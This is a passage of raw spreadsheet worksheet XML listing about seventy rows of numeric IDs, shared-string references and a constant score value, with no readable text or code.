      <c r="C33043" s="2" t="s">
        <v>31810</v>
      </c>
      <c r="D33043" s="2">
        <v>1.0</v>
      </c>
      <c r="E33043" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33043" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33044" ht="15.75" customHeight="1">
      <c r="A33044" s="1">
        <v>15172.0</v>
      </c>
      <c r="B33044" s="2">
        <v>4.2009325E7</v>
      </c>
      <c r="C33044" s="2" t="s">
        <v>31811</v>
      </c>
      <c r="D33044" s="2">
        <v>1.0</v>
      </c>
      <c r="E33044" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33044" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33045" ht="15.75" customHeight="1">
      <c r="A33045" s="1">
        <v>15183.0</v>
      </c>
      <c r="B33045" s="2">
        <v>4.2025368E7</v>
      </c>
      <c r="C33045" s="2" t="s">
        <v>31812</v>
      </c>
      <c r="D33045" s="2">
        <v>1.0</v>
      </c>
      <c r="E33045" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33045" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33046" ht="15.75" customHeight="1">
      <c r="A33046" s="1">
        <v>15457.0</v>
      </c>
      <c r="B33046" s="2">
        <v>4.3077637E7</v>
      </c>
      <c r="C33046" s="2" t="s">
        <v>31813</v>
      </c>
      <c r="D33046" s="2">
        <v>1.0</v>
      </c>
      <c r="E33046" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33046" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33047" ht="15.75" customHeight="1">
      <c r="A33047" s="1">
        <v>15736.0</v>
      </c>
      <c r="B33047" s="2">
        <v>4.4084357E7</v>
      </c>
      <c r="C33047" s="2" t="s">
        <v>31814</v>
      </c>
      <c r="D33047" s="2">
        <v>1.0</v>
      </c>
      <c r="E33047" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33047" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33048" ht="15.75" customHeight="1">
      <c r="A33048" s="1">
        <v>15759.0</v>
      </c>
      <c r="B33048" s="2">
        <v>4.416025E7</v>
      </c>
      <c r="C33048" s="2" t="s">
        <v>31815</v>
      </c>
      <c r="D33048" s="2">
        <v>1.0</v>
      </c>
      <c r="E33048" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33048" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33049" ht="15.75" customHeight="1">
      <c r="A33049" s="1">
        <v>15909.0</v>
      </c>
      <c r="B33049" s="2">
        <v>4.463645E7</v>
      </c>
      <c r="C33049" s="2" t="s">
        <v>31816</v>
      </c>
      <c r="D33049" s="2">
        <v>1.0</v>
      </c>
      <c r="E33049" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33049" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33050" ht="15.75" customHeight="1">
      <c r="A33050" s="1">
        <v>15930.0</v>
      </c>
      <c r="B33050" s="2">
        <v>4.4699775E7</v>
      </c>
      <c r="C33050" s="2" t="s">
        <v>31817</v>
      </c>
      <c r="D33050" s="2">
        <v>1.0</v>
      </c>
      <c r="E33050" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33050" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33051" ht="15.75" customHeight="1">
      <c r="A33051" s="1">
        <v>16207.0</v>
      </c>
      <c r="B33051" s="2">
        <v>4.5683803E7</v>
      </c>
      <c r="C33051" s="2" t="s">
        <v>31818</v>
      </c>
      <c r="D33051" s="2">
        <v>1.0</v>
      </c>
      <c r="E33051" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33051" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33052" ht="15.75" customHeight="1">
      <c r="A33052" s="1">
        <v>16490.0</v>
      </c>
      <c r="B33052" s="2">
        <v>4.655647E7</v>
      </c>
      <c r="C33052" s="2" t="s">
        <v>31819</v>
      </c>
      <c r="D33052" s="2">
        <v>1.0</v>
      </c>
      <c r="E33052" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33052" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33053" ht="15.75" customHeight="1">
      <c r="A33053" s="1">
        <v>16641.0</v>
      </c>
      <c r="B33053" s="2">
        <v>4.714879E7</v>
      </c>
      <c r="C33053" s="2" t="s">
        <v>31820</v>
      </c>
      <c r="D33053" s="2">
        <v>1.0</v>
      </c>
      <c r="E33053" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33053" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33054" ht="15.75" customHeight="1">
      <c r="A33054" s="1">
        <v>16955.0</v>
      </c>
      <c r="B33054" s="2">
        <v>4.8246091E7</v>
      </c>
      <c r="C33054" s="2" t="s">
        <v>31821</v>
      </c>
      <c r="D33054" s="2">
        <v>1.0</v>
      </c>
      <c r="E33054" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33054" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33055" ht="15.75" customHeight="1">
      <c r="A33055" s="1">
        <v>17058.0</v>
      </c>
      <c r="B33055" s="2">
        <v>4.8553213E7</v>
      </c>
      <c r="C33055" s="2" t="s">
        <v>31822</v>
      </c>
      <c r="D33055" s="2">
        <v>1.0</v>
      </c>
      <c r="E33055" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33055" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33056" ht="15.75" customHeight="1">
      <c r="A33056" s="1">
        <v>17081.0</v>
      </c>
      <c r="B33056" s="2">
        <v>4.8613207E7</v>
      </c>
      <c r="C33056" s="2" t="s">
        <v>31823</v>
      </c>
      <c r="D33056" s="2">
        <v>1.0</v>
      </c>
      <c r="E33056" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33056" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33057" ht="15.75" customHeight="1">
      <c r="A33057" s="1">
        <v>17185.0</v>
      </c>
      <c r="B33057" s="2">
        <v>4.891068E7</v>
      </c>
      <c r="C33057" s="2" t="s">
        <v>31824</v>
      </c>
      <c r="D33057" s="2">
        <v>1.0</v>
      </c>
      <c r="E33057" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33057" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33058" ht="15.75" customHeight="1">
      <c r="A33058" s="1">
        <v>17210.0</v>
      </c>
      <c r="B33058" s="2">
        <v>4.9037675E7</v>
      </c>
      <c r="C33058" s="2" t="s">
        <v>31825</v>
      </c>
      <c r="D33058" s="2">
        <v>1.0</v>
      </c>
      <c r="E33058" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33058" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33059" ht="15.75" customHeight="1">
      <c r="A33059" s="1">
        <v>17428.0</v>
      </c>
      <c r="B33059" s="2">
        <v>4.973193E7</v>
      </c>
      <c r="C33059" s="2" t="s">
        <v>31826</v>
      </c>
      <c r="D33059" s="2">
        <v>1.0</v>
      </c>
      <c r="E33059" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33059" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33060" ht="15.75" customHeight="1">
      <c r="A33060" s="1">
        <v>17446.0</v>
      </c>
      <c r="B33060" s="2">
        <v>4.9789309E7</v>
      </c>
      <c r="C33060" s="2" t="s">
        <v>31827</v>
      </c>
      <c r="D33060" s="2">
        <v>1.0</v>
      </c>
      <c r="E33060" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33060" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33061" ht="15.75" customHeight="1">
      <c r="A33061" s="1">
        <v>17457.0</v>
      </c>
      <c r="B33061" s="2">
        <v>4.9843593E7</v>
      </c>
      <c r="C33061" s="2" t="s">
        <v>31828</v>
      </c>
      <c r="D33061" s="2">
        <v>1.0</v>
      </c>
      <c r="E33061" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33061" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33062" ht="15.75" customHeight="1">
      <c r="A33062" s="1">
        <v>17769.0</v>
      </c>
      <c r="B33062" s="2">
        <v>5.0750858E7</v>
      </c>
      <c r="C33062" s="2" t="s">
        <v>31829</v>
      </c>
      <c r="D33062" s="2">
        <v>1.0</v>
      </c>
      <c r="E33062" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33062" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33063" ht="15.75" customHeight="1">
      <c r="A33063" s="1">
        <v>17785.0</v>
      </c>
      <c r="B33063" s="2">
        <v>5.0789038E7</v>
      </c>
      <c r="C33063" s="2" t="s">
        <v>31830</v>
      </c>
      <c r="D33063" s="2">
        <v>1.0</v>
      </c>
      <c r="E33063" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33063" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33064" ht="15.75" customHeight="1">
      <c r="A33064" s="1">
        <v>17814.0</v>
      </c>
      <c r="B33064" s="2">
        <v>5.0901846E7</v>
      </c>
      <c r="C33064" s="2" t="s">
        <v>31831</v>
      </c>
      <c r="D33064" s="2">
        <v>1.0</v>
      </c>
      <c r="E33064" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33064" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33065" ht="15.75" customHeight="1">
      <c r="A33065" s="1">
        <v>17830.0</v>
      </c>
      <c r="B33065" s="2">
        <v>5.0921976E7</v>
      </c>
      <c r="C33065" s="2" t="s">
        <v>31832</v>
      </c>
      <c r="D33065" s="2">
        <v>1.0</v>
      </c>
      <c r="E33065" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33065" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33066" ht="15.75" customHeight="1">
      <c r="A33066" s="1">
        <v>17973.0</v>
      </c>
      <c r="B33066" s="2">
        <v>5.1359725E7</v>
      </c>
      <c r="C33066" s="2" t="s">
        <v>31833</v>
      </c>
      <c r="D33066" s="2">
        <v>1.0</v>
      </c>
      <c r="E33066" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33066" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33067" ht="15.75" customHeight="1">
      <c r="A33067" s="1">
        <v>18038.0</v>
      </c>
      <c r="B33067" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C33067" s="2" t="s">
        <v>31834</v>
      </c>
      <c r="D33067" s="2">
        <v>1.0</v>
      </c>
      <c r="E33067" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33067" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33068" ht="15.75" customHeight="1">
      <c r="A33068" s="1">
        <v>18041.0</v>
      </c>
      <c r="B33068" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C33068" s="2" t="s">
        <v>31835</v>
      </c>
      <c r="D33068" s="2">
        <v>1.0</v>
      </c>
      <c r="E33068" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33068" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33069" ht="15.75" customHeight="1">
      <c r="A33069" s="1">
        <v>18173.0</v>
      </c>
      <c r="B33069" s="2">
        <v>5.1948048E7</v>
      </c>
      <c r="C33069" s="2" t="s">
        <v>31836</v>
      </c>
      <c r="D33069" s="2">
        <v>1.0</v>
      </c>
      <c r="E33069" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33069" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33070" ht="15.75" customHeight="1">
      <c r="A33070" s="1">
        <v>18242.0</v>
      </c>
      <c r="B33070" s="2">
        <v>5.2142445E7</v>
      </c>
      <c r="C33070" s="2" t="s">
        <v>31837</v>
      </c>
      <c r="D33070" s="2">
        <v>1.0</v>
      </c>
      <c r="E33070" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33070" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33071" ht="15.75" customHeight="1">
      <c r="A33071" s="1">
        <v>18276.0</v>
      </c>
      <c r="B33071" s="2">
        <v>5.2230292E7</v>
      </c>
      <c r="C33071" s="2" t="s">
        <v>31838</v>
      </c>
      <c r="D33071" s="2">
        <v>1.0</v>
      </c>
      <c r="E33071" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33071" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33072" ht="15.75" customHeight="1">
      <c r="A33072" s="1">
        <v>18360.0</v>
      </c>
      <c r="B33072" s="2">
        <v>5.2546408E7</v>
      </c>
      <c r="C33072" s="2" t="s">
        <v>31839</v>
      </c>
      <c r="D33072" s="2">
        <v>1.0</v>
      </c>
      <c r="E33072" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33072" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33073" ht="15.75" customHeight="1">
      <c r="A33073" s="1">
        <v>18369.0</v>
      </c>
      <c r="B33073" s="2">
        <v>5.2569774E7</v>
      </c>
      <c r="C33073" s="2" t="s">
        <v>31840</v>
      </c>
      <c r="D33073" s="2">
        <v>1.0</v>
      </c>
      <c r="E33073" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33073" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33074" ht="15.75" customHeight="1">
      <c r="A33074" s="1">
        <v>18553.0</v>
      </c>
      <c r="B33074" s="2">
        <v>5.3160259E7</v>
      </c>
      <c r="C33074" s="2" t="s">
        <v>31841</v>
      </c>
      <c r="D33074" s="2">
        <v>1.0</v>
      </c>
      <c r="E33074" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33074" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33075" ht="15.75" customHeight="1">
      <c r="A33075" s="1">
        <v>18864.0</v>
      </c>
      <c r="B33075" s="2">
        <v>5.4007638E7</v>
      </c>
      <c r="C33075" s="2" t="s">
        <v>31842</v>
      </c>
      <c r="D33075" s="2">
        <v>1.0</v>
      </c>
      <c r="E33075" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33075" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33076" ht="15.75" customHeight="1">
      <c r="A33076" s="1">
        <v>18936.0</v>
      </c>
      <c r="B33076" s="2">
        <v>5.4310005E7</v>
      </c>
      <c r="C33076" s="2" t="s">
        <v>31843</v>
      </c>
      <c r="D33076" s="2">
        <v>1.0</v>
      </c>
      <c r="E33076" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33076" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33077" ht="15.75" customHeight="1">
      <c r="A33077" s="1">
        <v>19067.0</v>
      </c>
      <c r="B33077" s="2">
        <v>5.4603869E7</v>
      </c>
      <c r="C33077" s="2" t="s">
        <v>31844</v>
      </c>
      <c r="D33077" s="2">
        <v>1.0</v>
      </c>
      <c r="E33077" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33077" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33078" ht="15.75" customHeight="1">
      <c r="A33078" s="1">
        <v>19135.0</v>
      </c>
      <c r="B33078" s="2">
        <v>5.4795107E7</v>
      </c>
      <c r="C33078" s="2" t="s">
        <v>31845</v>
      </c>
      <c r="D33078" s="2">
        <v>1.0</v>
      </c>
      <c r="E33078" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33078" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33079" ht="15.75" customHeight="1">
      <c r="A33079" s="1">
        <v>19189.0</v>
      </c>
      <c r="B33079" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C33079" s="2" t="s">
        <v>31846</v>
      </c>
      <c r="D33079" s="2">
        <v>1.0</v>
      </c>
      <c r="E33079" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33079" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33080" ht="15.75" customHeight="1">
      <c r="A33080" s="1">
        <v>19233.0</v>
      </c>
      <c r="B33080" s="2">
        <v>5.5075198E7</v>
      </c>
      <c r="C33080" s="2" t="s">
        <v>31847</v>
      </c>
      <c r="D33080" s="2">
        <v>1.0</v>
      </c>
      <c r="E33080" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33080" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33081" ht="15.75" customHeight="1">
      <c r="A33081" s="1">
        <v>19616.0</v>
      </c>
      <c r="B33081" s="2">
        <v>5.6214039E7</v>
      </c>
      <c r="C33081" s="2" t="s">
        <v>31848</v>
      </c>
      <c r="D33081" s="2">
        <v>1.0</v>
      </c>
      <c r="E33081" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33081" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33082" ht="15.75" customHeight="1">
      <c r="A33082" s="1">
        <v>19734.0</v>
      </c>
      <c r="B33082" s="2">
        <v>5.6654256E7</v>
      </c>
      <c r="C33082" s="2" t="s">
        <v>31849</v>
      </c>
      <c r="D33082" s="2">
        <v>1.0</v>
      </c>
      <c r="E33082" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33082" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33083" ht="15.75" customHeight="1">
      <c r="A33083" s="1">
        <v>20058.0</v>
      </c>
      <c r="B33083" s="2">
        <v>8280794.0</v>
      </c>
      <c r="C33083" s="2" t="s">
        <v>31850</v>
      </c>
      <c r="D33083" s="2">
        <v>1.0</v>
      </c>
      <c r="E33083" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33083" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33084" ht="15.75" customHeight="1">
      <c r="A33084" s="1">
        <v>20207.0</v>
      </c>
      <c r="B33084" s="2">
        <v>1.0664113E7</v>
      </c>
      <c r="C33084" s="2" t="s">
        <v>31851</v>
      </c>
      <c r="D33084" s="2">
        <v>1.0</v>
      </c>
      <c r="E33084" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33084" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33085" ht="15.75" customHeight="1">
      <c r="A33085" s="1">
        <v>20346.0</v>
      </c>
      <c r="B33085" s="2">
        <v>1.1629407E7</v>
      </c>
      <c r="C33085" s="2" t="s">
        <v>31710</v>
      </c>
      <c r="D33085" s="2">
        <v>1.0</v>
      </c>
      <c r="E33085" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33085" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33086" ht="15.75" customHeight="1">
      <c r="A33086" s="1">
        <v>20497.0</v>
      </c>
      <c r="B33086" s="2">
        <v>1.2878925E7</v>
      </c>
      <c r="C33086" s="2" t="s">
        <v>31852</v>
      </c>
      <c r="D33086" s="2">
        <v>1.0</v>
      </c>
      <c r="E33086" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33086" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33087" ht="15.75" customHeight="1">
      <c r="A33087" s="1">
        <v>20870.0</v>
      </c>
      <c r="B33087" s="2">
        <v>1.5935904E7</v>
      </c>
      <c r="C33087" s="2" t="s">
        <v>31853</v>
      </c>
      <c r="D33087" s="2">
        <v>1.0</v>
      </c>
      <c r="E33087" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33087" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33088" ht="15.75" customHeight="1">
      <c r="A33088" s="1">
        <v>20940.0</v>
      </c>
      <c r="B33088" s="2">
        <v>1.6503019E7</v>
      </c>
      <c r="C33088" s="2" t="s">
        <v>31854</v>
      </c>
      <c r="D33088" s="2">
        <v>1.0</v>
      </c>
      <c r="E33088" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33088" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33089" ht="15.75" customHeight="1">
      <c r="A33089" s="1">
        <v>20988.0</v>
      </c>
      <c r="B33089" s="2">
        <v>1.7018923E7</v>
      </c>
      <c r="C33089" s="2" t="s">
        <v>7315</v>
      </c>
      <c r="D33089" s="2">
        <v>1.0</v>
      </c>
      <c r="E33089" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33089" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33090" ht="15.75" customHeight="1">
      <c r="A33090" s="1">
        <v>21253.0</v>
      </c>
      <c r="B33090" s="2">
        <v>2.0036704E7</v>
      </c>
      <c r="C33090" s="2" t="s">
        <v>31855</v>
      </c>
      <c r="D33090" s="2">
        <v>1.0</v>
      </c>
      <c r="E33090" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33090" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33091" ht="15.75" customHeight="1">
      <c r="A33091" s="1">
        <v>21811.0</v>
      </c>
      <c r="B33091" s="2">
        <v>2.6795676E7</v>
      </c>
      <c r="C33091" s="2" t="s">
        <v>31856</v>
      </c>
      <c r="D33091" s="2">
        <v>1.0</v>
      </c>
      <c r="E33091" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33091" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33092" ht="15.75" customHeight="1">
      <c r="A33092" s="1">
        <v>21826.0</v>
      </c>
      <c r="B33092" s="2">
        <v>2.6957544E7</v>
      </c>
      <c r="C33092" s="2" t="s">
        <v>31857</v>
      </c>
      <c r="D33092" s="2">
        <v>1.0</v>
      </c>
      <c r="E33092" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33092" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33093" ht="15.75" customHeight="1">
      <c r="A33093" s="1">
        <v>21840.0</v>
      </c>
      <c r="B33093" s="2">
        <v>2.7105136E7</v>
      </c>
      <c r="C33093" s="2" t="s">
        <v>31710</v>
      </c>
      <c r="D33093" s="2">
        <v>1.0</v>
      </c>
      <c r="E33093" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33093" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33094" ht="15.75" customHeight="1">
      <c r="A33094" s="1">
        <v>21983.0</v>
      </c>
      <c r="B33094" s="2">
        <v>2.9416225E7</v>
      </c>
      <c r="C33094" s="2" t="s">
        <v>31858</v>
      </c>
      <c r="D33094" s="2">
        <v>1.0</v>
      </c>
      <c r="E33094" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33094" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33095" ht="15.75" customHeight="1">
      <c r="A33095" s="1">
        <v>23230.0</v>
      </c>
      <c r="B33095" s="2">
        <v>5.286671E7</v>
      </c>
      <c r="C33095" s="2" t="s">
        <v>31859</v>
      </c>
      <c r="D33095" s="2">
        <v>1.0</v>
      </c>
      <c r="E33095" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33095" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33096" ht="15.75" customHeight="1">
      <c r="A33096" s="1">
        <v>23443.0</v>
      </c>
      <c r="B33096" s="2">
        <v>5.6699145E7</v>
      </c>
      <c r="C33096" s="2" t="s">
        <v>31860</v>
      </c>
      <c r="D33096" s="2">
        <v>1.0</v>
      </c>
      <c r="E33096" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33096" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33097" ht="15.75" customHeight="1">
      <c r="A33097" s="1">
        <v>23630.0</v>
      </c>
      <c r="B33097" s="2">
        <v>6561543.0</v>
      </c>
      <c r="C33097" s="2" t="s">
        <v>31861</v>
      </c>
      <c r="D33097" s="2">
        <v>1.0</v>
      </c>
      <c r="E33097" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33097" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33098" ht="15.75" customHeight="1">
      <c r="A33098" s="1">
        <v>24195.0</v>
      </c>
      <c r="B33098" s="2">
        <v>1.0288159E7</v>
      </c>
      <c r="C33098" s="2" t="s">
        <v>31862</v>
      </c>
      <c r="D33098" s="2">
        <v>1.0</v>
      </c>
      <c r="E33098" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33098" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33099" ht="15.75" customHeight="1">
      <c r="A33099" s="1">
        <v>24237.0</v>
      </c>
      <c r="B33099" s="2">
        <v>1.0473103E7</v>
      </c>
      <c r="C33099" s="2" t="s">
        <v>31863</v>
      </c>
      <c r="D33099" s="2">
        <v>1.0</v>
      </c>
      <c r="E33099" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33099" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33100" ht="15.75" customHeight="1">
      <c r="A33100" s="1">
        <v>24261.0</v>
      </c>
      <c r="B33100" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C33100" s="2" t="s">
        <v>31864</v>
      </c>
      <c r="D33100" s="2">
        <v>1.0</v>
      </c>
      <c r="E33100" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33100" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33101" ht="15.75" customHeight="1">
      <c r="A33101" s="1">
        <v>24372.0</v>
      </c>
      <c r="B33101" s="2">
        <v>1.0762641E7</v>
      </c>
      <c r="C33101" s="2" t="s">
        <v>31865</v>
      </c>
      <c r="D33101" s="2">
        <v>1.0</v>
      </c>
      <c r="E33101" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33101" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33102" ht="15.75" customHeight="1">
      <c r="A33102" s="1">
        <v>24397.0</v>
      </c>
      <c r="B33102" s="2">
        <v>1.0787066E7</v>
      </c>
      <c r="C33102" s="2" t="s">
        <v>31866</v>
      </c>
      <c r="D33102" s="2">
        <v>1.0</v>
      </c>
      <c r="E33102" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33102" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33103" ht="15.75" customHeight="1">
      <c r="A33103" s="1">
        <v>24691.0</v>
      </c>
      <c r="B33103" s="2">
        <v>1.1629406E7</v>
      </c>
      <c r="C33103" s="2" t="s">
        <v>31710</v>
      </c>
      <c r="D33103" s="2">
        <v>1.0</v>
      </c>
      <c r="E33103" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33103" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33104" ht="15.75" customHeight="1">
      <c r="A33104" s="1">
        <v>24874.0</v>
      </c>
      <c r="B33104" s="2">
        <v>1.2228129E7</v>
      </c>
      <c r="C33104" s="2" t="s">
        <v>31867</v>
      </c>
      <c r="D33104" s="2">
        <v>1.0</v>
      </c>
      <c r="E33104" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33104" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33105" ht="15.75" customHeight="1">
      <c r="A33105" s="1">
        <v>25044.0</v>
      </c>
      <c r="B33105" s="2">
        <v>1.2845577E7</v>
      </c>
      <c r="C33105" s="2" t="s">
        <v>31868</v>
      </c>
      <c r="D33105" s="2">
        <v>1.0</v>
      </c>
      <c r="E33105" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33105" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33106" ht="15.75" customHeight="1">
      <c r="A33106" s="1">
        <v>25073.0</v>
      </c>
      <c r="B33106" s="2">
        <v>1.2878924E7</v>
      </c>
      <c r="C33106" s="2" t="s">
        <v>31852</v>
      </c>
      <c r="D33106" s="2">
        <v>1.0</v>
      </c>
      <c r="E33106" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33106" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33107" ht="15.75" customHeight="1">
      <c r="A33107" s="1">
        <v>25222.0</v>
      </c>
      <c r="B33107" s="2">
        <v>1.3308406E7</v>
      </c>
      <c r="C33107" s="2" t="s">
        <v>31869</v>
      </c>
      <c r="D33107" s="2">
        <v>1.0</v>
      </c>
      <c r="E33107" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33107" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33108" ht="15.75" customHeight="1">
      <c r="A33108" s="1">
        <v>25293.0</v>
      </c>
      <c r="B33108" s="2">
        <v>1.3409295E7</v>
      </c>
      <c r="C33108" s="2" t="s">
        <v>31870</v>
      </c>
      <c r="D33108" s="2">
        <v>1.0</v>
      </c>
      <c r="E33108" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33108" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33109" ht="15.75" customHeight="1">
      <c r="A33109" s="1">
        <v>25850.0</v>
      </c>
      <c r="B33109" s="2">
        <v>1.4853992E7</v>
      </c>
      <c r="C33109" s="2" t="s">
        <v>31871</v>
      </c>
      <c r="D33109" s="2">
        <v>1.0</v>
      </c>
      <c r="E33109" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33109" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33110" ht="15.75" customHeight="1">
      <c r="A33110" s="1">
        <v>25987.0</v>
      </c>
      <c r="B33110" s="2">
        <v>1.5327998E7</v>
      </c>
